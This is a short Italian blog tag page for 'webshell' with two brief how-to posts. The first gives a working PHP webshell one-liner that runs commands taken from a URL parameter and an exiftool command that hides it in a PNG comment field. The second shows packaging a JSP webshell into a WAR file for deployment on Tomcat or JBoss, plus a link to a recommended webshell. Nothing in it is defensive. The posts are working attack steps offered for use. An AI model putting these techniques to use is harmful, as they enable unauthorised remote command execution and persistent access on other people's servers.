Visualizzazione post con etichetta webshell. Mostra tutti i post
Visualizzazione post con etichetta webshell. Mostra tutti i post

19/07/13

Creare una webshell-image con exiftool

1) Creare un file.php con il seguente codice (ad esempio):
<?php system($_GET['c']); ?> 

2) Iniettarlo in un'immagine usando exiftool:
# exiftool "-comment<=file.php" malicious.png

05/05/13

Creare un WAR a partire da un JSP

Utile per creare una webshell di cui fare il deploy su Server Apache Tomcat o JBoss:

# jar -cf webshell.war webshell.jsp

Ottima webshell:
http://i8jesus.com/?p=191